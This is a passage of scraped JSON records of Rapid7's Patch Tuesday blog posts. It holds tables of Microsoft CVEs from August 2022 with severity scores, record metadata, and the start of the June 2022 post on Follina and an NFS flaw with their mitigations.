\n[CVE-2022-35813](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35813>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35788](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35788>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35814](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35814>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35789](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35789>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35815](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35815>) 
| Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35790](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35790>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35816](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35816>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35817](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35817>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35791](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35791>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35818](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35818>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35819](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35819>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 6.5 | Yes \n[CVE-2022-35776](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35776>) | Azure Site Recovery Denial of Service Vulnerability | No | No | 6.2 | Yes \n[CVE-2022-34685](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34685>) | Azure RTOS GUIX Studio Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-34686](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34686>) | Azure RTOS GUIX Studio Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-35774](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35774>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 4.9 | Yes 
\n[CVE-2022-35800](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35800>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 4.9 | Yes \n[CVE-2022-35787](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35787>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 4.9 | Yes \n[CVE-2022-35821](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35821>) | Azure Sphere Information Disclosure Vulnerability | No | No | 4.4 | Yes \n[CVE-2022-35783](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35783>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 4.4 | Yes \n[CVE-2022-35812](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35812>) | Azure Site Recovery Elevation of Privilege Vulnerability | No | No | 4.4 | Yes \n \n### Browser vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? 
\n---|---|---|---|---|--- \n[CVE-2022-33649](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-33649>) | Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability | No | No | 9.6 | Yes \n[CVE-2022-33636](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-33636>) | Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | No | No | 8.3 | Yes \n[CVE-2022-35796](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35796>) | Microsoft Edge (Chromium-based) Elevation of Privilege Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-2624](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2624>) | Chromium: CVE-2022-2624 Heap buffer overflow in PDF | No | No | N/A | Yes \n[CVE-2022-2623](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2623>) | Chromium: CVE-2022-2623 Use after free in Offline | No | No | N/A | Yes \n[CVE-2022-2622](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2622>) | Chromium: CVE-2022-2622 Insufficient validation of untrusted input in Safe Browsing | No | No | N/A | Yes \n[CVE-2022-2621](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2621>) | Chromium: CVE-2022-2621 Use after free in Extensions | No | No | N/A | Yes \n[CVE-2022-2619](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2619>) | Chromium: CVE-2022-2619 Insufficient validation of untrusted input in Settings | No | No | N/A | Yes \n[CVE-2022-2618](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2618>) | Chromium: CVE-2022-2618 Insufficient validation of untrusted input in Internals | No | No | N/A | Yes \n[CVE-2022-2617](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2617>) | Chromium: CVE-2022-2617 Use after free in Extensions API | No | No | N/A | Yes 
\n[CVE-2022-2616](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2616>) | Chromium: CVE-2022-2616 Inappropriate implementation in Extensions API | No | No | N/A | Yes \n[CVE-2022-2615](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2615>) | Chromium: CVE-2022-2615 Insufficient policy enforcement in Cookies | No | No | N/A | Yes \n[CVE-2022-2614](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2614>) | Chromium: CVE-2022-2614 Use after free in Sign-In Flow | No | No | N/A | Yes \n[CVE-2022-2612](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2612>) | Chromium: CVE-2022-2612 Side-channel information leakage in Keyboard input | No | No | N/A | Yes \n[CVE-2022-2611](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2611>) | Chromium: CVE-2022-2611 Inappropriate implementation in Fullscreen API | No | No | N/A | Yes \n[CVE-2022-2610](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2610>) | Chromium: CVE-2022-2610 Insufficient policy enforcement in Background Fetch | No | No | N/A | Yes \n[CVE-2022-2606](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2606>) | Chromium: CVE-2022-2606 Use after free in Managed devices API | No | No | N/A | Yes \n[CVE-2022-2605](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2605>) | Chromium: CVE-2022-2605 Out of bounds read in Dawn | No | No | N/A | Yes \n[CVE-2022-2604](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2604>) | Chromium: CVE-2022-2604 Use after free in Safe Browsing | No | No | N/A | Yes \n[CVE-2022-2603](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-2603>) | Chromium: CVE-2022-2603 Use after free in Omnibox | No | No | N/A | Yes \n \n### Developer Tools vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? 
| CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-35777](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35777>) | Visual Studio Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-35825](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35825>) | Visual Studio Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-35826](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35826>) | Visual Studio Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-35827](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35827>) | Visual Studio Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-34716](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34716>) | .NET Spoofing Vulnerability | No | No | 5.9 | Yes \n \n### ESU Windows vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? 
\n---|---|---|---|---|--- \n[CVE-2022-30133](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30133>) | Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-35744](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35744>) | Windows Point-to-Point Protocol (PPP) Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-34691](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34691>) | Active Directory Domain Services Elevation of Privilege Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-34714](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34714>) | Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-35745](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35745>) | Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-35752](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35752>) | Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-35753](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35753>) | Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-34702](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34702>) | Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-35767](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35767>) | Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability | No | No | 8.1 | Yes 
\n[CVE-2022-34706](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34706>) | Windows Local Security Authority (LSA) Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-34707](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34707>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35768](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35768>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35756](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35756>) | Windows Kerberos Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35751](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35751>) | Windows Hyper-V Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35795](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35795>) | Windows Error Reporting Service Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35820](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35820>) | Windows Bluetooth Driver Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35750](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35750>) | Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-34713](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34713>) | Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability | Yes | Yes | 7.8 | Yes \n[CVE-2022-35743](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35743>) | Microsoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability | No | No | 7.8 | Yes 
\n[CVE-2022-35760](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35760>) | Microsoft ATA Port Driver Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-30194](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30194>) | Windows WebBrowser Control Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-35769](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35769>) | Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability | No | No | 7.5 | No \n[CVE-2022-35793](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35793>) | Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.3 | Yes \n[CVE-2022-34690](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34690>) | Windows Fax Service Elevation of Privilege Vulnerability | No | No | 7.1 | Yes \n[CVE-2022-35759](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35759>) | Windows Local Security Authority (LSA) Denial of Service Vulnerability | No | No | 6.5 | No \n[CVE-2022-35747](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35747>) | Windows Point-to-Point Protocol (PPP) Denial of Service Vulnerability | No | No | 5.9 | Yes \n[CVE-2022-35758](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35758>) | Windows Kernel Memory Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-34708](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34708>) | Windows Kernel Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-34701](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34701>) | Windows Secure Socket Tunneling Protocol (SSTP) Denial of Service Vulnerability | No | No | 5.3 | No \n \n### Exchange Server vulnerabilities\n\nCVE | Title | Exploited? 
| Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-21980](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21980>) | Microsoft Exchange Server Elevation of Privilege Vulnerability | No | No | 8 | Yes \n[CVE-2022-24516](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24516>) | Microsoft Exchange Server Elevation of Privilege Vulnerability | No | No | 8 | Yes \n[CVE-2022-24477](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-24477>) | Microsoft Exchange Server Elevation of Privilege Vulnerability | No | No | 8 | Yes \n[CVE-2022-30134](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30134>) | Microsoft Exchange Information Disclosure Vulnerability | No | Yes | 7.6 | Yes \n[CVE-2022-34692](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34692>) | Microsoft Exchange Information Disclosure Vulnerability | No | No | 5.3 | Yes \n[CVE-2022-21979](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-21979>) | Microsoft Exchange Information Disclosure Vulnerability | No | No | 4.8 | Yes \n \n### Microsoft Office vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? 
\n---|---|---|---|---|--- \n[CVE-2022-34717](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34717>) | Microsoft Office Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-33648](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-33648>) | Microsoft Excel Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35742](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35742>) | Microsoft Outlook Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-33631](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-33631>) | Microsoft Excel Security Feature Bypass Vulnerability | No | No | 7.3 | Yes \n \n### System Center Azure vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? \n---|---|---|---|---|--- \n[CVE-2022-33640](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-33640>) | System Center Operations Manager: Open Management Infrastructure (OMI) Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n \n### Windows vulnerabilities\n\nCVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score | Has FAQ? 
\n---|---|---|---|---|--- \n[CVE-2022-34715](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34715>) | Windows Network File System Remote Code Execution Vulnerability | No | No | 9.8 | Yes \n[CVE-2022-35804](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35804>) | SMB Client and Server Remote Code Execution Vulnerability | No | No | 8.8 | Yes \n[CVE-2022-35761](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35761>) | Windows Kernel Elevation of Privilege Vulnerability | No | No | 8.4 | Yes \n[CVE-2022-35766](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35766>) | Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-35794](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35794>) | Windows Secure Socket Tunneling Protocol (SSTP) Remote Code Execution Vulnerability | No | No | 8.1 | Yes \n[CVE-2022-34699](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34699>) | Windows Win32k Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-33670](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-33670>) | Windows Partition Management Driver Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-34703](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34703>) | Windows Partition Management Driver Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-34696](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34696>) | Windows Hyper-V Remote Code Execution Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35746](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35746>) | Windows Digital Media Receiver Elevation of Privilege Vulnerability | No | No | 7.8 | Yes 
\n[CVE-2022-35749](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35749>) | Windows Digital Media Receiver Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-34705](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34705>) | Windows Defender Credential Guard Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35771](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35771>) | Windows Defender Credential Guard Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35762](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35762>) | Storage Spaces Direct Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35763](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35763>) | Storage Spaces Direct Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35764](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35764>) | Storage Spaces Direct Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35765](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35765>) | Storage Spaces Direct Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-35792](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35792>) | Storage Spaces Direct Elevation of Privilege Vulnerability | No | No | 7.8 | Yes \n[CVE-2022-30144](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30144>) | Windows Bluetooth Service Remote Code Execution Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-35748](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35748>) | HTTP.sys Denial of Service Vulnerability | No | No | 7.5 | Yes \n[CVE-2022-35755](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35755>) | 
Windows Print Spooler Elevation of Privilege Vulnerability | No | No | 7.3 | Yes \n[CVE-2022-35757](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35757>) | Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability | No | No | 7.3 | Yes \n[CVE-2022-35754](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35754>) | Unified Write Filter Elevation of Privilege Vulnerability | No | No | 6.7 | Yes \n[CVE-2022-35797](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-35797>) | Windows Hello Security Feature Bypass Vulnerability | No | No | 6.1 | Yes \n[CVE-2022-34709](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34709>) | Windows Defender Credential Guard Security Feature Bypass Vulnerability | No | No | 6 | Yes \n[CVE-2022-30197](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-30197>) | Windows Kernel Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-34710](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34710>) | Windows Defender Credential Guard Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-34712](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34712>) | Windows Defender Credential Guard Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-34704](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34704>) | Windows Defender Credential Guard Information Disclosure Vulnerability | No | No | 5.5 | Yes \n[CVE-2022-34303](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34303>) | CERT/CC: CVE-2022-34303 Crypto Pro Boot Loader Bypass | No | No | N/A | Yes \n[CVE-2022-34302](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34302>) | CERT/CC: CVE-2022-34302 New Horizon Data Systems Inc Boot Loader Bypass | No | No | 
N/A | Yes \n[CVE-2022-34301](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-34301>) | CERT/CC: CVE-2022-34301 Eurosoft Boot Loader Bypass | No | No | N/A | Yes \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T19:34:51", "type": "rapid7blog", "title": "Patch Tuesday - August 2022", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-21979", "CVE-2022-21980", "CVE-2022-24477", "CVE-2022-24516", "CVE-2022-2603", "CVE-2022-2604", "CVE-2022-2605", "CVE-2022-2606", "CVE-2022-2610", "CVE-2022-2611", "CVE-2022-2612", "CVE-2022-2614", "CVE-2022-2615", "CVE-2022-2616", "CVE-2022-2617", "CVE-2022-2618", "CVE-2022-2619", "CVE-2022-2621", "CVE-2022-2622", "CVE-2022-2623", "CVE-2022-2624", "CVE-2022-30133", "CVE-2022-30134", "CVE-2022-30144", "CVE-2022-30175", "CVE-2022-30176", "CVE-2022-30190", "CVE-2022-30194", "CVE-2022-30197", "CVE-2022-33631", "CVE-2022-33636", "CVE-2022-33640", "CVE-2022-33646", "CVE-2022-33648", "CVE-2022-33649", "CVE-2022-33670", 
"CVE-2022-34301", "CVE-2022-34302", "CVE-2022-34303", "CVE-2022-34685", "CVE-2022-34686", "CVE-2022-34687", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34692", "CVE-2022-34696", "CVE-2022-34699", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34703", "CVE-2022-34704", "CVE-2022-34705", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34709", "CVE-2022-34710", "CVE-2022-34712", "CVE-2022-34713", "CVE-2022-34714", "CVE-2022-34715", "CVE-2022-34716", "CVE-2022-34717", "CVE-2022-35742", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35746", "CVE-2022-35747", "CVE-2022-35748", "CVE-2022-35749", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", "CVE-2022-35754", "CVE-2022-35755", "CVE-2022-35756", "CVE-2022-35757", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35761", "CVE-2022-35762", "CVE-2022-35763", "CVE-2022-35764", "CVE-2022-35765", "CVE-2022-35766", "CVE-2022-35767", "CVE-2022-35768", "CVE-2022-35769", "CVE-2022-35771", "CVE-2022-35772", "CVE-2022-35773", "CVE-2022-35774", "CVE-2022-35775", "CVE-2022-35776", "CVE-2022-35777", "CVE-2022-35779", "CVE-2022-35780", "CVE-2022-35781", "CVE-2022-35782", "CVE-2022-35783", "CVE-2022-35784", "CVE-2022-35785", "CVE-2022-35786", "CVE-2022-35787", "CVE-2022-35788", "CVE-2022-35789", "CVE-2022-35790", "CVE-2022-35791", "CVE-2022-35792", "CVE-2022-35793", "CVE-2022-35794", "CVE-2022-35795", "CVE-2022-35796", "CVE-2022-35797", "CVE-2022-35799", "CVE-2022-35800", "CVE-2022-35801", "CVE-2022-35802", "CVE-2022-35804", "CVE-2022-35806", "CVE-2022-35807", "CVE-2022-35808", "CVE-2022-35809", "CVE-2022-35810", "CVE-2022-35811", "CVE-2022-35812", "CVE-2022-35813", "CVE-2022-35814", "CVE-2022-35815", "CVE-2022-35816", "CVE-2022-35817", "CVE-2022-35818", "CVE-2022-35819", "CVE-2022-35820", "CVE-2022-35821", "CVE-2022-35824", "CVE-2022-35825", "CVE-2022-35826", "CVE-2022-35827"], "modified": "2022-08-09T19:34:51", "id": "RAPID7BLOG:882168BD332366CE296FB09DC00E018E", 
"href": "https://blog.rapid7.com/2022/08/09/patch-tuesday-august-2022/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-24T22:03:33", "description": "\n\nJune's Patch Tuesday sees Microsoft releasing fixes for over 60 CVEs. Top of mind for many administrators this month is [CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>), also known as Follina, which was observed being exploited in the wild [at the end of May](<https://www.rapid7.com/blog/post/2022/05/31/cve-2022-30190-follina-microsoft-support-diagnostic-tool-vulnerability/>). Microsoft provided [mitigation instructions](<https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/>) (disabling the MSDT URL protocol via the registry), but actual patches were not available until today\u2019s cumulative Windows Updates. Even if the mitigation was previously applied, installing the updates is highly recommended.\n\nNone of the other CVEs being addressed this month have been previously disclosed or seen exploited yet. However, it won\u2019t be long before attackers start looking at [CVE-2022-30136](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30136>), a critical remote code execution (RCE) vulnerability affecting the Windows Network File System (NFS). Last month, Microsoft fixed a similar vulnerability ([CVE-2022-26937](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26937>)) affecting NFS v2.0 and v3.0. [CVE-2022-30136](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30136>), on the other hand, is only exploitable in NFS v4.1. Microsoft has provided mitigation guidance to disable NFS v4.1, which should only be done if the May updates fixing previous NFS versions have been applied. 
